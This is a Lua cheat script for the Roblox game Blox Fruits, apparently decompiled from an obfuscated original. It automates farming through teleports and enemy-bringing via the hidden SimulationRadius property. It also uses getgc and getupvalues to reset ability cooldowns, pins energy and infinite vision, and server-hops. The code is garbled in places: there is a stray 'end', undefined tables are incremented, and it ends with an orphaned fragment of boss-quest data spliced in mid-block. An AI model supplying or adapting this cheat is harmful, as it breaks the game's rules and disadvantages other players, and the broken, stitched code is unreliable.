local L_1_ = {}
L_1_[2] = table["concat"]
do
	ply = game["Players"]
	plr = ply["LocalPlayer"]
	Root = plr["Character"]["HumanoidRootPart"]
	replicated = game:GetService("ReplicatedStorage")
	Lv = game["Players"]["LocalPlayer"]["Data"]["Level"]["Value"]
	TeleportService = game:GetService("TeleportService")
	TW = game:GetService("TweenService")
	Lighting = game:GetService("Lighting")
	Enemies = workspace["Enemies"]
	vim1 = game:GetService("VirtualInputManager")
	vim2 = game:GetService("VirtualUser")
	TeamSelf = plr["Team"]
	RunSer = game:GetService("RunService")
	Stats = game:GetService("Stats")
	Energy = plr["Character"]["Energy"]["Value"]
	BringConnections = {}
	BossList = {}
	MaterialList = {}
	NPCList = {}
	shouldTween = false
	SoulGuitar = false
	KenTest = true
	debug = false
	Brazier1 = false
	Brazier2 = false
	Brazier3 = false
	Sec = .1
	ClickState = 0
	Num_self = 25
end
repeat
	local L_2_ = {}
	L_2_[2] = (plr["PlayerGui"]:WaitForChild("Main")):WaitForChild("Loading") and game:IsLoaded()
	wait()
until L_2_[2]
World1 = game["PlaceId"] == 2753915549 or game["PlaceId"] == 85211729168715
World2 = game["PlaceId"] == 4442272183 or game["PlaceId"] == 79091703265657
World3 = game["PlaceId"] == 7449423635 or game["PlaceId"] == 1.0011733112309e+14
Marines = function()
	replicated["Remotes"]["CommF_"]:InvokeServer("SetTeam", "Marines")
end
Pirates = function()
	replicated["Remotes"]["CommF_"]:InvokeServer("SetTeam", "Pirates")
end
if World1 then
	BossList = {
		"The Gorilla King";
		"Bobby",
		"The Saw";
		"Yeti",
		"Mob Leader";
		"Vice Admiral",
		"Saber Expert",
		"Warden";
		"Chief Warden";
		"Swan",
		"Magma Admiral",
		"Fishman Lord";
		"Wysper",
		"Thunder God",
		"Cyborg";
		"Ice Admiral",
		"Greybeard"
	}
elseif World2 then
	BossList = {
		"Diamond",
		"Jeremy",
		"Orbitus";
		"Don Swan";
		"Smoke Admiral",
		"Awakened Ice Admiral",
		"Tide Keeper",
		"Darkbeard";
		"Cursed Captain";
		"Order"
	}
elseif World3 then
	BossList = {
		"Stone",
		"Hydra Leader",
		"Kilo Admiral";
		"Captain Elephant";
		"Beautiful Pirate";
		"Cake Queen";
		"Dough King";
		"Longma",
		"Soul Reaper";
		"rip_indra True Form";
		"Tyrant of the Skies"
	}
end
if World1 then
	MaterialList = {
		L_1_[2]({
			"Leather + Scrap Meta";
			"l"
		}),
		"Angel Wings",
		"Magma Ore",
		"Fish Tail"
	}
elseif World2 then
	MaterialList = {
		L_1_[2]({
			"Leather + Scrap Meta";
			"l"
		}),
		"Radioactive Material",
		"Ectoplasm",
		"Mystic Droplet",
		"Magma Ore",
		"Vampire Fang"
	}
elseif World3 then
	MaterialList = {
		"Scrap Metal",
		"Demonic Wisp";
		"Conjured Cocoa";
		"Dragon Scale",
		"Gunpowder",
		"Fish Tail",
		"Mini Tusk"
	}
end
L_1_[15] = {
	"Flame",
	"Ice",
	"Quake",
	"Light";
	"Dark",
	"String",
	"Rumble",
	"Magma",
	"Human: Buddha",
	"Sand",
	"Bird: Phoenix",
	"Dough"
}
L_1_[138] = {
	"Snow Lurker";
	"Arctic Warrior";
	"Hidden Key";
	"Awakened Ice Admiral"
}
L_1_[24] = {
	["Mob"] = "Mythological Pirate",
	["Mob2"] = "Cursed Skeleton",
	"Hell's Messenger";
	["Mob3"] = "Cursed Skeleton";
	"Heaven's Guardian"
}
L_1_[26] = {
	"Part",
	"SpawnLocation";
	"Terrain";
	"WedgePart",
	"MeshPart"
}
L_1_[81] = {
	"Swan Pirate";
	"Jeremy"
}
L_1_[126] = {
	"Forest Pirate";
	"Captain Elephant"
}
L_1_[110] = {
	"Fajita";
	"Jeremy",
	"Diamond"
}
L_1_[12] = {
	"Beast Hunter",
	"Lantern",
	"Guardian";
	"Grand Brigade",
	"Dinghy",
	"Sloop",
	"The Sentinel"
}
L_1_[122] = {
	"Cookie Crafter"
}
L_1_[95] = {
	"Reborn Skeleton"
}
L_1_[22] = {
	["Pirate Millionaire"] = CFrame["new"](-712.82727050781, 98.577049255371, 5711.9541015625);
	["Pistol Billionaire"] = CFrame["new"](-723.43316650391, 147.42906188965, 5931.9931640625);
	["Dragon Crew Warrior"] = CFrame["new"](7021.5043945312, 55.762702941895, -730.12908935547);
	["Dragon Crew Archer"] = CFrame["new"](6625, 378, 244);
	["Female Islander"] = CFrame["new"](4692.7939453125, 797.97668457031, 858.84802246094),
	["Venomous Assailant"] = CFrame["new"](4902, 670, 39),
	["Marine Commodore"] = CFrame["new"](2401, 123, -7589);
	["Marine Rear Admiral"] = CFrame["new"](3588, 229, -7085);
	["Fishman Raider"] = CFrame["new"](-10941, 332, -8760);
	["Fishman Captain"] = CFrame["new"](-11035, 332, -9087);
	["Forest Pirate"] = CFrame["new"](-13446, 413, -7760),
	["Mythological Pirate"] = CFrame["new"](-13510, 584, -6987);
	["Jungle Pirate"] = CFrame["new"](-11778, 426, -10592);
	["Musketeer Pirate"] = CFrame["new"](-13282, 496, -9565);
	["Reborn Skeleton"] = CFrame["new"](-8764, 142, 5963);
	["Living Zombie"] = CFrame["new"](-10227, 421, 6161);
	["Demonic Soul"] = CFrame["new"](-9579, 6, 6194),
	["Posessed Mummy"] = CFrame["new"](-9579, 6, 6194),
	["Peanut Scout"] = CFrame["new"](-1993, 187, -10103),
	["Peanut President"] = CFrame["new"](-2215, 159, -10474);
	["Ice Cream Chef"] = CFrame["new"](-877, 118, -11032),
	["Ice Cream Commander"] = CFrame["new"](-877, 118, -11032),
	["Cookie Crafter"] = CFrame["new"](-2021, 38, -12028);
	["Cake Guard"] = CFrame["new"](-2024, 38, -12026),
	["Baking Staff"] = CFrame["new"](-1932, 38, -12848),
	["Head Baker"] = CFrame["new"](-1932, 38, -12848);
	["Cocoa Warrior"] = CFrame["new"](95, 73, -12309);
	[L_1_[2]({
		"Chocolate Bar Battle";
		"r"
	})] = CFrame["new"](647, 42, -12401),
	["Sweet Thief"] = CFrame["new"](116, 36, -12478);
	["Candy Rebel"] = CFrame["new"](47, 61, -12889),
	["Ghost"] = CFrame["new"](5251, 5, 1111)
}
L_1_[64] = {
	["RFJobsRemoteFunction"] = replicated["Modules"]["Net"][L_1_[2]({
		"RF/JobsRemoteFunctio";
		"n"
	})];
	["RFCraft"] = ((replicated:WaitForChild("Modules")):WaitForChild("Net")):WaitForChild("RF/Craft")
}
EquipWeapon = function(L_3_arg0)
	local L_4_ = {}
	L_4_[1] = L_3_arg0
	if not L_4_[1] then
		return
	end
	if plr["Backpack"]:FindFirstChild(L_4_[1]) then
		plr["Character"]["Humanoid"]:EquipTool(plr["Backpack"]:FindFirstChild(L_4_[1]))
	end
end
weaponSc = function(L_5_arg0)
	local L_6_ = {}
	L_6_[2] = L_5_arg0
	for L_7_forvar0, L_8_forvar1 in pairs(plr["Backpack"]:GetChildren()) do
		local L_9_ = {}
		L_9_[1], L_9_[3] = L_7_forvar0, L_8_forvar1
		if L_9_[3]:IsA("Tool") then
			if L_9_[3]["ToolTip"] == L_6_[2] then
				EquipWeapon(L_9_[3]["Name"])
			end
		end
	end
end
L_1_[4] = {}
L_1_[4]["__index"] = L_1_[4]
L_1_[4]["Alive"] = function(L_10_arg0)
	local L_11_ = {}
	L_11_[2] = L_10_arg0
	if not L_11_[2] then
		return
	end
	L_11_[3] = L_11_[2]:FindFirstChild("Humanoid")
	return L_11_[3] and L_11_[3]["Health"] > 0
end
L_1_[4]["Pos"] = function(L_12_arg0, L_13_arg1)
	local L_14_ = {}
	L_14_[1], L_14_[2] = L_12_arg0, L_13_arg1
	return (Root["Position"] - mode["Position"])["Magnitude"] <= L_14_[2]
end
L_1_[4]["Dist"] = function(L_15_arg0, L_16_arg1)
	local L_17_ = {}
	L_17_[1], L_17_[2] = L_15_arg0, L_16_arg1
	return (Root["Position"] - (L_17_[1]:FindFirstChild("HumanoidRootPart"))["Position"])["Magnitude"] <= L_17_[2]
end
L_1_[4]["DistH"] = function(L_18_arg0, L_19_arg1)
	local L_20_ = {}
	L_20_[2], L_20_[3] = L_18_arg0, L_19_arg1
	return (Root["Position"] - (L_20_[2]:FindFirstChild("HumanoidRootPart"))["Position"])["Magnitude"] > L_20_[3]
end
L_1_[4]["Kill"] = function(L_21_arg0, L_22_arg1)
	local L_23_ = {}
	L_23_[1], L_23_[3] = L_21_arg0, L_22_arg1
	if L_23_[1] and L_23_[3] then
		local L_24_ = {}
		if not L_23_[1]:GetAttribute("Locked") then
			L_23_[1]:SetAttribute("Locked", L_23_[1]["HumanoidRootPart"]["CFrame"])
		end
		PosMon = (L_23_[1]:GetAttribute("Locked"))["Position"]
		BringEnemy()
		EquipWeapon(_G["SelectWeapon"])
		L_24_[2] = game["Players"]["LocalPlayer"]["Character"]:FindFirstChildOfClass("Tool")
		L_24_[1] = L_24_[2]["ToolTip"]
		if L_24_[1] == "Blox Fruit" then
			_tp((L_23_[1]["HumanoidRootPart"]["CFrame"] * CFrame["new"](0, 10, 0)) * CFrame["Angles"](0, math["rad"](90), 0))
		else
			_tp((L_23_[1]["HumanoidRootPart"]["CFrame"] * CFrame["new"](0, 30, 0)) * CFrame["Angles"](0, math["rad"](180), 0))
		end
		if RandomCFrame then
			wait(.5)
			_tp(L_23_[1]["HumanoidRootPart"]["CFrame"] * CFrame["new"](0, 30, 25))
			wait(.5)
			_tp(L_23_[1]["HumanoidRootPart"]["CFrame"] * CFrame["new"](25, 30, 0))
			wait(.5)
			_tp(L_23_[1]["HumanoidRootPart"]["CFrame"] * CFrame["new"](-25, 30, 0))
			wait(.5)
			_tp(L_23_[1]["HumanoidRootPart"]["CFrame"] * CFrame["new"](0, 30, 25))
			wait(.5)
			_tp(L_23_[1]["HumanoidRootPart"]["CFrame"] * CFrame["new"](-25, 30, 0))
		end
	end
end
L_1_[4]["Kill2"] = function(L_25_arg0, L_26_arg1)
	local L_27_ = {}
	L_27_[1], L_27_[2] = L_25_arg0, L_26_arg1
	if L_27_[1] and L_27_[2] then
		local L_28_ = {}
		if not L_27_[1]:GetAttribute("Locked") then
			L_27_[1]:SetAttribute("Locked", L_27_[1]["HumanoidRootPart"]["CFrame"])
		end
		PosMon = (L_27_[1]:GetAttribute("Locked"))["Position"]
		BringEnemy()
		EquipWeapon(_G["SelectWeapon"])
		L_28_[1] = game["Players"]["LocalPlayer"]["Character"]:FindFirstChildOfClass("Tool")
		L_28_[3] = L_28_[1]["ToolTip"]
		if L_28_[3] == "Blox Fruit" then
			_tp((L_27_[1]["HumanoidRootPart"]["CFrame"] * CFrame["new"](0, 10, 0)) * CFrame["Angles"](0, math["rad"](90), 0))
		else
			_tp((L_27_[1]["HumanoidRootPart"]["CFrame"] * CFrame["new"](0, 30, 8)) * CFrame["Angles"](0, math["rad"](180), 0))
		end
		if RandomCFrame then
			wait(.1)
			_tp(L_27_[1]["HumanoidRootPart"]["CFrame"] * CFrame["new"](0, 30, 25))
			wait(.1)
			_tp(L_27_[1]["HumanoidRootPart"]["CFrame"] * CFrame["new"](25, 30, 0))
			wait(.1)
			_tp(L_27_[1]["HumanoidRootPart"]["CFrame"] * CFrame["new"](-25, 30, 0))
			wait(.1)
			_tp(L_27_[1]["HumanoidRootPart"]["CFrame"] * CFrame["new"](0, 30, 25))
			wait(.1)
			_tp(L_27_[1]["HumanoidRootPart"]["CFrame"] * CFrame["new"](-25, 30, 0))
		end
	end
end
L_1_[4]["KillSea"] = function(L_29_arg0, L_30_arg1)
	local L_31_ = {}
	L_31_[2], L_31_[1] = L_29_arg0, L_30_arg1
	if L_31_[2] and L_31_[1] then
		local L_32_ = {}
		if not L_31_[2]:GetAttribute("Locked") then
			L_31_[2]:SetAttribute("Locked", L_31_[2]["HumanoidRootPart"]["CFrame"])
		end
		PosMon = (L_31_[2]:GetAttribute("Locked"))["Position"]
		BringEnemy()
		EquipWeapon(_G["SelectWeapon"])
		L_32_[1] = game["Players"]["LocalPlayer"]["Character"]:FindFirstChildOfClass("Tool")
		L_32_[2] = L_32_[1]["ToolTip"]
		if L_32_[2] == "Blox Fruit" then
			_tp((L_31_[2]["HumanoidRootPart"]["CFrame"] * CFrame["new"](0, 10, 0)) * CFrame["Angles"](0, math["rad"](90), 0))
		else
			notween(L_31_[2]["HumanoidRootPart"]["CFrame"] * CFrame["new"](0, 50, 8))
			wait(.85)
			notween(L_31_[2]["HumanoidRootPart"]["CFrame"] * CFrame["new"](0, 400, 0))
			wait(1)
		end
	end
end
L_1_[4]["Sword"] = function(L_33_arg0, L_34_arg1)
	local L_35_ = {}
	L_35_[2], L_35_[3] = L_33_arg0, L_34_arg1
	if L_35_[2] and L_35_[3] then
		if not L_35_[2]:GetAttribute("Locked") then
			L_35_[2]:SetAttribute("Locked", L_35_[2]["HumanoidRootPart"]["CFrame"])
		end
		PosMon = (L_35_[2]:GetAttribute("Locked"))["Position"]
		BringEnemy()
		weaponSc("Sword")
		_tp(L_35_[2]["HumanoidRootPart"]["CFrame"] * CFrame["new"](0, 30, 0))
		if RandomCFrame then
			wait(.1)
			_tp(L_35_[2]["HumanoidRootPart"]["CFrame"] * CFrame["new"](0, 30, 25))
			wait(.1)
			_tp(L_35_[2]["HumanoidRootPart"]["CFrame"] * CFrame["new"](25, 30, 0))
			wait(.1)
			_tp(L_35_[2]["HumanoidRootPart"]["CFrame"] * CFrame["new"](-25, 30, 0))
			wait(.1)
			_tp(L_35_[2]["HumanoidRootPart"]["CFrame"] * CFrame["new"](0, 30, 25))
			wait(.1)
			_tp(L_35_[2]["HumanoidRootPart"]["CFrame"] * CFrame["new"](-25, 30, 0))
		end
	end
end
L_1_[4]["Mas"] = function(L_36_arg0, L_37_arg1)
	local L_38_ = {}
	L_38_[2], L_38_[3] = L_36_arg0, L_37_arg1
	if L_38_[2] and L_38_[3] then
		if not L_38_[2]:GetAttribute("Locked") then
			L_38_[2]:SetAttribute("Locked", L_38_[2]["HumanoidRootPart"]["CFrame"])
		end
		PosMon = (L_38_[2]:GetAttribute("Locked"))["Position"]
		BringEnemy()
		if L_38_[2]["Humanoid"]["Health"] <= HealthM then
			_tp(L_38_[2]["HumanoidRootPart"]["CFrame"] * CFrame["new"](0, 20, 0))
			Useskills("Blox Fruit", "Z")
			Useskills("Blox Fruit", "X")
			Useskills("Blox Fruit", "C")
		else
			weaponSc("Melee")
			_tp(L_38_[2]["HumanoidRootPart"]["CFrame"] * CFrame["new"](0, 30, 0))
		end
	end
end
L_1_[4]["Masgun"] = function(L_39_arg0, L_40_arg1)
	local L_41_ = {}
	L_41_[3], L_41_[1] = L_39_arg0, L_40_arg1
	if L_41_[3] and L_41_[1] then
		if not L_41_[3]:GetAttribute("Locked") then
			L_41_[3]:SetAttribute("Locked", L_41_[3]["HumanoidRootPart"]["CFrame"])
		end
		PosMon = (L_41_[3]:GetAttribute("Locked"))["Position"]
		BringEnemy()
		if L_41_[3]["Humanoid"]["Health"] <= HealthM then
			_tp(L_41_[3]["HumanoidRootPart"]["CFrame"] * CFrame["new"](0, 35, 8))
			Useskills("Gun", "Z")
			Useskills("Gun", "X")
		else
			weaponSc("Melee")
			_tp(L_41_[3]["HumanoidRootPart"]["CFrame"] * CFrame["new"](0, 30, 0))
		end
	end
end
statsSetings = function(L_42_arg0, L_43_arg1)
	local L_44_ = {}
	L_44_[3], L_44_[2] = L_42_arg0, L_43_arg1
	if L_44_[3] == "Melee" then
		if plr["Data"]["Points"]["Value"] ~= 0 then
			replicated["Remotes"]["CommF_"]:InvokeServer("AddPoint", "Melee", L_44_[2])
		end
	elseif L_44_[3] == "Defense" then
		if plr["Data"]["Points"]["Value"] ~= 0 then
			replicated["Remotes"]["CommF_"]:InvokeServer("AddPoint", "Defense", L_44_[2])
		end
	elseif L_44_[3] == "Sword" then
		if plr["Data"]["Points"]["Value"] ~= 0 then
			replicated["Remotes"]["CommF_"]:InvokeServer("AddPoint", "Sword", L_44_[2])
		end
	elseif L_44_[3] == "Gun" then
		if plr["Data"]["Points"]["Value"] ~= 0 then
			replicated["Remotes"]["CommF_"]:InvokeServer("AddPoint", "Gun", L_44_[2])
		end
	elseif L_44_[3] == "Devil" then
		if plr["Data"]["Points"]["Value"] ~= 0 then
			replicated["Remotes"]["CommF_"]:InvokeServer("AddPoint", "Demon Fruit", L_44_[2])
		end
	end
end
BringEnemy = function()
	local L_45_ = {}
	if not _B then
		return
	end
	if not PosMon then
		return
	end
	L_45_[4] = game["Players"]["LocalPlayer"]
	L_45_[5] = L_45_[4]["Character"] and L_45_[4]["Character"]:FindFirstChild("HumanoidRootPart")
	if not L_45_[5] then
		return
	end
	L_45_[9] = game:GetService("TweenService")
	L_45_[8] = _G["BringRange"]
	L_45_[7] = _G["SpeedB"]
	L_45_[6] = _G["MobM"]
	L_45_[1] = 0
	L_45_[2] = {}
	for L_46_forvar0, L_47_forvar1 in pairs(workspace["Enemies"]:GetChildren()) do
		local L_48_ = {}
		L_48_[4], L_48_[1] = L_46_forvar0, L_47_forvar1
		if L_45_[1] >= L_45_[6] then
			break
		end
		L_48_[6] = false
		for L_49_forvar0, L_50_forvar1 in ipairs(BossList or {}) do
			local L_51_ = {}
			L_51_[2], L_51_[1] = L_49_forvar0, L_50_forvar1
			if L_48_[1]["Name"] == L_51_[1] then
				L_48_[6] = true
				break
			end
		end
		if L_48_[6] then
			continue
		end
		L_48_[2] = L_48_[1]:FindFirstChild("Humanoid")
		L_48_[3] = L_48_[1]:FindFirstChild("HumanoidRootPart")
		if not(L_48_[2] and (L_48_[3] and L_48_[2]["Health"] > 0)) then
			continue
		end
		if (L_48_[3]["Position"] - L_45_[5]["Position"])["Magnitude"] <= L_45_[8] then
			local L_52_ = {}
			R_[1] += 1
			L_52_[2] = Vector3["zero"]
			L_52_[3] = 0
			for L_53_forvar0, L_54_forvar1 in pairs(workspace["Enemies"]:GetChildren()) do
				local L_55_ = {}
				L_55_[2], L_55_[5] = L_53_forvar0, L_54_forvar1
				L_55_[4] = L_55_[5]:FindFirstChild("Humanoid")
				L_55_[1] = L_55_[5]:FindFirstChild("HumanoidRootPart")
				if L_55_[4] and (L_55_[1] and (L_55_[4]["Health"] > 0 and L_55_[5]["Name"] == L_48_[1]["Name"])) then
					D_[2] += L_55_[1]["Position"]
					D_[3] += 1
				end
			end
			L_52_[1] = L_52_[3] > 0 and L_52_[2] / L_52_[3] or L_48_[3]["Position"]
			L_52_[4] = CFrame["new"](L_52_[1])
			L_52_[5] = (L_48_[3]["Position"] - L_52_[4]["Position"])["Magnitude"]
			if L_52_[5] > 3 then
				local L_56_ = {}
				L_56_[2] = TweenInfo["new"](L_52_[5] / L_45_[7], Enum["EasingStyle"]["Linear"]);
				(L_45_[9]:Create(L_48_[3], L_56_[2], {
					["CFrame"] = L_52_[4]
				})):Play()
			end
			L_48_[3]["CanCollide"] = false
			L_48_[3][L_1_[2]({
				"AssemblyLinearVeloci";
				"ty"
			})] = Vector3["zero"]
			L_48_[3][L_1_[2]({
				"AssemblyAngularVeloc";
				"ity"
			})] = Vector3["zero"]
			if L_48_[2]:FindFirstChild("Animator") then
				L_48_[2]["Animator"]:Destroy()
			end
			if not L_48_[3]:FindFirstChild("BodyVelocity") then
				local L_57_ = {}
				L_57_[1] = Instance["new"]("BodyVelocity")
				L_57_[1]["Name"] = "BodyVelocity"
				L_57_[1]["MaxForce"] = Vector3["new"](1000000000, 1000000000, 1000000000)
				L_57_[1]["Velocity"] = Vector3["zero"]
				L_57_[1]["Parent"] = L_48_[3]
			end
			pcall(function()
				sethiddenproperty(L_45_[4], "SimulationRadius", math["huge"])
			end)
		end
	end
end
Useskills = function(L_58_arg0, L_59_arg1)
	local L_60_ = {}
	L_60_[3], L_60_[2] = L_58_arg0, L_59_arg1
	if L_60_[3] == "Melee" then
		weaponSc("Melee")
		if L_60_[2] == "Z" then
			vim1:SendKeyEvent(true, "Z", false, game)
			vim1:SendKeyEvent(false, "Z", false, game)
		elseif L_60_[2] == "X" then
			vim1:SendKeyEvent(true, "X", false, game)
			vim1:SendKeyEvent(false, "X", false, game)
		elseif L_60_[2] == "C" then
			vim1:SendKeyEvent(true, "C", false, game)
			vim1:SendKeyEvent(false, "C", false, game)
		end
	elseif L_60_[3] == "Sword" then
		weaponSc("Sword")
		if L_60_[2] == "Z" then
			vim1:SendKeyEvent(true, "Z", false, game)
			vim1:SendKeyEvent(false, "Z", false, game)
		elseif L_60_[2] == "X" then
			vim1:SendKeyEvent(true, "X", false, game)
			vim1:SendKeyEvent(false, "X", false, game)
		end
	elseif L_60_[3] == "Blox Fruit" then
		weaponSc("Blox Fruit")
		if L_60_[2] == "Z" then
			vim1:SendKeyEvent(true, "Z", false, game)
			vim1:SendKeyEvent(false, "Z", false, game)
		elseif L_60_[2] == "X" then
			vim1:SendKeyEvent(true, "X", false, game)
			vim1:SendKeyEvent(false, "X", false, game)
		elseif L_60_[2] == "C" then
			vim1:SendKeyEvent(true, "C", false, game)
			vim1:SendKeyEvent(false, "C", false, game)
		elseif L_60_[2] == "V" then
			vim1:SendKeyEvent(true, "V", false, game)
			vim1:SendKeyEvent(false, "V", false, game)
		end
	elseif L_60_[3] == "Gun" then
		weaponSc("Gun")
		if L_60_[2] == "Z" then
			vim1:SendKeyEvent(true, "Z", false, game)
			vim1:SendKeyEvent(false, "Z", false, game)
		elseif L_60_[2] == "X" then
			vim1:SendKeyEvent(true, "X", false, game)
			vim1:SendKeyEvent(false, "X", false, game)
		end
	end
	if L_60_[3] == "nil" and L_60_[2] == "Y" then
		vim1:SendKeyEvent(true, "Y", false, game)
		vim1:SendKeyEvent(false, "Y", false, game)
	end
end
end
GetIn = function(L_118_arg0)
	local L_119_ = {}
	L_119_[1] = L_118_arg0
	for L_120_forvar0, L_121_forvar1 in pairs(replicated["Remotes"]["CommF_"]:InvokeServer("getInventory")) do
		local L_122_ = {}
		L_122_[2], L_122_[3] = L_120_forvar0, L_121_forvar1
		if type(L_122_[3]) == "table" then
			if L_122_[3]["Name"] == L_119_[1] or plr["Character"]:FindFirstChild(L_119_[1]) or plr["Backpack"]:FindFirstChild(L_119_[1]) then
				return true
			end
		end
	end
	return false
end
GetM = function(L_123_arg0)
	local L_124_ = {}
	L_124_[1] = L_123_arg0
	for L_125_forvar0, L_126_forvar1 in pairs(replicated["Remotes"]["CommF_"]:InvokeServer("getInventory")) do
		local L_127_ = {}
		L_127_[2], L_127_[3] = L_125_forvar0, L_126_forvar1
		if type(L_127_[3]) == "table" then
			if L_127_[3]["Type"] == "Material" then
				if L_127_[3]["Name"] == L_124_[1] then
					return L_127_[3]["Count"]
				end
			end
		end
	end
	return 0
end
GetWP = function(L_128_arg0)
	local L_129_ = {}
	L_129_[1] = L_128_arg0
	for L_130_forvar0, L_131_forvar1 in pairs(replicated["Remotes"]["CommF_"]:InvokeServer("getInventory")) do
		local L_132_ = {}
		L_132_[2], L_132_[1] = L_130_forvar0, L_131_forvar1
		if type(L_132_[1]) == "table" then
			if L_132_[1]["Type"] == "Sword" then
				if L_132_[1]["Name"] == L_129_[1] or plr["Character"]:FindFirstChild(L_129_[1]) or plr["Backpack"]:FindFirstChild(L_129_[1]) then
					return true
				end
			end
		end
	end
	return false
end
getInfinity_Ability = function(L_133_arg0, L_134_arg1)
	local L_135_ = {}
	L_135_[2], L_135_[1] = L_133_arg0, L_134_arg1
	if not Root then
		return
	end
	if L_135_[2] == "Soru" and L_135_[1] then
		for L_136_forvar0, L_137_forvar1 in next, getgc() do
			local L_138_ = {}
			L_138_[1], L_138_[3] = L_136_forvar0, L_137_forvar1
			if plr["Character"]["Soru"] then
				if typeof(L_138_[3]) == "function" and (getfenv(L_138_[3]))["script"] == plr["Character"]["Soru"] then
					for L_139_forvar0, L_140_forvar1 in next, getupvalues(L_138_[3]) do
						local L_141_ = {}
						L_141_[3], L_141_[1] = L_139_forvar0, L_140_forvar1
						if typeof(L_141_[1]) == "table" then
							repeat
								wait(Sec)
								L_141_[1]["LastUse"] = 0
							until not L_135_[1] or plr["Character"]["Humanoid"]["Health"] <= 0
						end
					end
				end
			end
		end
	elseif L_135_[2] == "Energy" and L_135_[1] then
		plr["Character"]["Energy"]["Changed"]:connect(function()
			if L_135_[1] then
				plr["Character"]["Energy"]["Value"] = Energy
			end
		end)
	elseif L_135_[2] == "Observation" and L_135_[1] then
		local L_142_ = {}
		L_142_[2] = plr["VisionRadius"]
		L_142_[2]["Value"] = math["huge"]
	end
end
Hop = function()
	pcall(function()
		for L_143_forvar0 = math["random"](1, math["random"](40, 75)), 100, 1 do
			local L_144_ = {}
			L_144_[2] = L_143_forvar0
			L_144_[1] = replicated["__ServerBrowser"]:InvokeServer(L_144_[2])
			for L_145_forvar0, L_146_forvar1 in next, L_144_[1] do
				local L_147_ = {}
				L_147_[1], L_147_[3] = L_145_forvar0, L_146_forvar1
				if tonumber(L_147_[3]["Count"]) < 12 then
					TeleportService:TeleportToPlaceInstance(game["PlaceId"], L_147_[1])
				end
			end
		end
	end)
end
L_1_[36] = Instance["new"]("Part", workspace)
L_1_[36]["Size"] = Vector3["new"](1, 1, 1)
L_1_[36]["Name"] = "Rip_Indra"
L_1_[36]["Anchored"] = true
L_1_[36]["CanCollide"] = false
L_1_[36]["CanTouch"] = false
L_1_[36]["Transparency"] = 1
L_1_[34] = workspace:FindFirstChild(L_1_[36]["Name"])
if L_1_[34] and L_1_[34] ~= L_1_[36] then
	L_1_[34]:Destroy()
end
task["spawn"](function()
	while task["wait"]() do
		if L_1_[36] and L_1_[36]["Parent"] == workspace then
			if shouldTween then
				(getgenv())["OnFarm"] = true
			else
				(getgenv())["OnFarm"] = false
			end
		else
			(getgenv())["OnFarm"] = false
		end
	end
end)
task["spawn"](function()
	local L_148_ = {}
	L_148_[1] = game["Players"]["LocalPlayer"]
	repeat
		task["wait"]()
	until L_148_[1]["Character"] and L_148_[1]["Character"]["PrimaryPart"]
	L_1_[36]["CFrame"] = L_148_[1]["Character"]["PrimaryPart"]["CFrame"]
	while task["wait"]() do
		pcall(function()
			if (getgenv())["OnFarm"] then
				local L_149_ = {}
				if L_1_[36] and L_1_[36]["Parent"] == workspace then
					local L_150_ = {}
					L_150_[2] = L_148_[1]["Character"] and L_148_[1]["Character"]["PrimaryPart"]
					if L_150_[2] and (L_150_[2]["Position"] - L_1_[36]["Position"])["Magnitude"] <= 200 then
						L_150_[2]["CFrame"] = L_1_[36]["CFrame"]
					else
						L_1_[36]["CFrame"] = L_150_[2]["CFrame"]
					end
				end
				L_149_[2] = L_148_[1]["Character"]
				if L_149_[2] then
					for L_151_forvar0, L_152_forvar1 in pairs(L_149_[2]:GetChildren()) do
						local L_153_ = {}
						L_153_[2], L_153_[1] = L_151_forvar0, L_152_forvar1
						if L_153_[1]:IsA("BasePart") then
							L_153_[1]["CanCollide"] = false
						end
					end
				end
			else
				local L_154_ = {}
				L_154_[2] = L_148_[1]["Character"]
				if L_154_[2] then
					for L_155_forvar0, L_156_forvar1 in pairs(L_154_[2]:GetChildren()) do
						local L_157_ = {}
						L_157_[1], L_157_[3] = L_155_forvar0, L_156_forvar1
						if L_157_[3]:IsA("BasePart") then
							L_157_[3]["CanCollide"] = true
						end
					end
				end
			end
		end)
	end
end)
_tp = function(L_158_arg0)
	local L_159_ = {}
	L_159_[4] = L_158_arg0
	L_159_[3] = plr["Character"]
	if not L_159_[3] or not L_159_[3]:FindFirstChild("HumanoidRootPart") then
		return
	end
	L_159_[6] = L_159_[3]["HumanoidRootPart"]
	L_159_[2] = (L_159_[4]["Position"] - L_159_[6]["Position"])["Magnitude"]
	L_159_[7] = TweenInfo["new"](L_159_[2] / 300, Enum["EasingStyle"]["Linear"])
	L_159_[1] = (game:GetService("TweenService")):Create(L_1_[36], L_159_[7], {
		["CFrame"] = L_159_[4]
	})
	if plr["Character"]["Humanoid"]["Sit"] == true then
		L_1_[36]["CFrame"] = CFrame["new"](L_1_[36]["Position"]["X"], L_159_[4]["Y"], L_1_[36]["Position"]["Z"])
	end
	L_159_[1]:Play()
	task["spawn"](function()
		while L_159_[1]["PlaybackState"] == Enum["PlaybackState"]["Playing"] do
			if not shouldTween then
				L_159_[1]:Cancel()
				break
			end
			task["wait"](.1)
		end
	end)
end
TeleportToTarget = function(L_160_arg0)
	local L_161_ = {}
	L_161_[1] = L_160_arg0
	if (L_161_[1]["Position"] - plr["Character"]["HumanoidRootPart"]["Position"])["Magnitude"] > 1000 then
		_tp(L_161_[1])
	else
		_tp(L_161_[1])
	end
end
notween = function(L_162_arg0)
	local L_163_ = {}
	L_163_[2] = L_162_arg0
	plr["Character"]["HumanoidRootPart"]["CFrame"] = L_163_[2]
end
function BTP(L_164_arg0)
	local L_165_ = {}
	L_165_[5] = L_164_arg0
	L_165_[8] = game["Players"]["LocalPlayer"]
	L_165_[2] = L_165_[8]["Character"]["HumanoidRootPart"]
	L_165_[1] = L_165_[8]["Character"]["Humanoid"]
	L_165_[7] = L_165_[8]["PlayerGui"]["Main"]
	L_165_[6] = L_165_[5]["Position"]
	L_165_[4] = L_165_[2]["Position"]
	repeat
		L_165_[1]["Health"] = 0
		L_165_[2]["CFrame"] = L_165_[5]
		L_165_[7]["Quest"]["Visible"] = false
		if (L_165_[2]["Position"] - L_165_[4])["Magnitude"] > 1 then
			L_165_[4] = L_165_[2]["Position"]
			L_165_[2]["CFrame"] = L_165_[5]
		end
		task["wait"](.5)
	until (L_165_[5]["Position"] - L_165_[2]["Position"])["Magnitude"] <= 2000
end
			Qdata = 3
			PosQBoss = CFrame["new"](61122.65234375, 18.497442245483, 1569.3997802734)
			PosB = CFrame["new"](61260.15234375, 30.950881958008, 1193.4329833984)
		elseif _G["FindBoss"] == "Wysper" then
			bMon = "Wysper"
			Qname = "SkyExp1Quest"
			Qdata = 3
